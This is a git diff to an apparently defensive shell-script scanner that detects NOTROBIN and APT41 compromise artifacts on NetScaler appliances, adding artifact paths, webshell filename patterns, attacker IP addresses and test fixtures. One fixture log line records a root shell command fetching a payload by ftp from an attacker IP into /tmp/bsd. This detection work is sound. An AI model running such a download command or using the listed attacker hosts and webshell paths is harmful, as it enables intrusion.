diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh index f831303..51f5753 100644 --- a/scanners/fs-paths.sh +++ b/scanners/fs-paths.sh @@ -14,6 +14,9 @@ scan_fs_notrobin() { declare -a notrobin_paths; notrobin_paths[0]="/var/nstmp/.nscache/httpd"; notrobin_paths[1]="/tmp/.init/httpd"; + # from subsequent post + notrobin_paths[2]="/var/nstmp/.nscache/prev.sh"; + notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean"; local found=false; for notrobin_path in "${notrobin_paths[@]}"; do @@ -23,6 +26,26 @@ scan_fs_notrobin() { fi done + declare -a dirs; + dirs[0]="/var/vpn/theme"; + dirs[1]="/var/vpn/themes"; + + declare -a blacklist; + blacklist[0]="[a-f0-9]\{32\}\.php"; + blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)"; + + for dir in "${dirs[@]}"; do + if [ -d "$root_directory/$dir" ]; then + for blackterm in "${blacklist[@]}"; do + local entries=$(ls "$root_directory/$dir" | grep "$blackterm"); + if [ -n "$entries" ]; then + found=true; + report_match "$entries, known path to NOTROBIN artifact."; + fi + done + fi + done + if [ "$found" != true ]; then debug "did not find NOTROBIN artifacts"; fi @@ -45,11 +68,49 @@ scan_fs_isc_paths() { if [ "$found" != true ]; then debug "did not find artifact enumerated by SANS ISC"; fi +} + +scan_fs_apt41() { + declare -a paths; + paths[0]="/tmp/bsd"; + paths[1]="/tmp/un"; + + local found=false; + for path in "${paths[@]}"; do + if [ -f "$root_directory/$path" ]; then + found=true; + report_match "$path, known path to post-exploitation artifact."; + fi + done + + if [ "$found" != true ]; then + debug "did not find file system artifact"; + fi +} + +scan_fs_other_paths() { + declare -a paths; + paths[0]="/vpn/themes/imgs/tiny.php"; + paths[1]="/vpn/themes/imgs/debug.php"; + paths[2]="/vpn/themes/imgs/conn.php"; + + local found=false; + for path in "${paths[@]}"; do + if [ -f "$root_directory/$path" ]; then + found=true; + report_match "$path, known path to post-exploitation artifact."; + fi + done + if [ "$found" != true ]; then + debug "did not find file system artifact"; + fi } scan_fs_known_paths() { scan_fs_netscalerd; scan_fs_notrobin; scan_fs_isc_paths; + scan_fs_apt41; + scan_fs_other_paths; } diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh index e4345f9..3627eb3 100644 --- a/scanners/netscaler-content.sh +++ b/scanners/netscaler-content.sh @@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126"; ns_content_blacklist[26]="/tmp/l.sh"; ns_content_blacklist[27]="Digest::MD5"; ns_content_blacklist[28]="Could not execute command"; +# from subsequent NOTROBIN and/or APT41 blog posts from FEYE +ns_content_blacklist[29]="/tmp/bsd"; +ns_content_blacklist[30]="/tmp/un"; +ns_content_blacklist[31]="66.42.98.220"; +ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh"; +ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean"; +ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php"; +ns_content_blacklist[35]="/vpn/themes/imgs/debug.php"; +ns_content_blacklist[36]="/vpn/themes/imgs/conn.php"; declare -a ns_exploit_dirs; ns_exploit_dirs[0]="/netscaler/portal/templates/"; @@ -59,6 +68,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/"; ns_exploit_dirs[2]="/var/vpn/bookmark/"; ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/"; ns_exploit_dirs[4]="/var/vpn/themes/"; +ns_exploit_dirs[5]="/var/vpn/theme/"; # custom output formatting for matches. # if the filename ends with .xml print the whole file, diff --git a/scanners/shell-history.sh b/scanners/shell-history.sh index cb96e34..272f804 100644 --- a/scanners/shell-history.sh +++ b/scanners/shell-history.sh @@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22" shell_history_blacklist[36]="193.187.174.104" shell_history_blacklist[37]="62.113.112.33" shell_history_blacklist[38]="217.12.221.12" +# from subsequent NOTROBIN and/or APT41 blog posts from FEYE +shell_history_blacklist[39]="/tmp/bsd"; +shell_history_blacklist[40]="/tmp/un"; +shell_history_blacklist[41]="66.42.98.220"; +shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh"; +shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean"; +shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php"; +shell_history_blacklist[45]="/vpn/themes/imgs/debug.php"; +shell_history_blacklist[46]="/vpn/themes/imgs/conn.php"; declare -a shell_history_paths; shell_history_paths[0]="/var/log/bash.log"; diff --git a/tests/file-system/apt41/.test b/tests/file-system/apt41/.test new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/apt41/tmp/bsd b/tests/file-system/apt41/tmp/bsd new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/apt41/tmp/un b/tests/file-system/apt41/tmp/un new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/notrobin-var-vpn-theme-random/.test b/tests/file-system/notrobin-var-vpn-theme-random/.test new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php b/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/notrobin-var-vpn-theme-y/.test b/tests/file-system/notrobin-var-vpn-theme-y/.test new file mode 100644 index 0000000..e69de29 diff --git a/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl b/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl new file mode 100644 index 0000000..e69de29 diff --git a/tests/shell-history/bsd/.test b/tests/shell-history/bsd/.test new file mode 100644 index 0000000..e69de29 diff --git a/tests/shell-history/bsd/var/log/bash.log b/tests/shell-history/bsd/var/log/bash.log new file mode 100644 index 0000000..f410a30 --- /dev/null +++ b/tests/shell-history/bsd/var/log/bash.log @@ -0,0 +1 @@ +Jan 19 24:26:52 ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"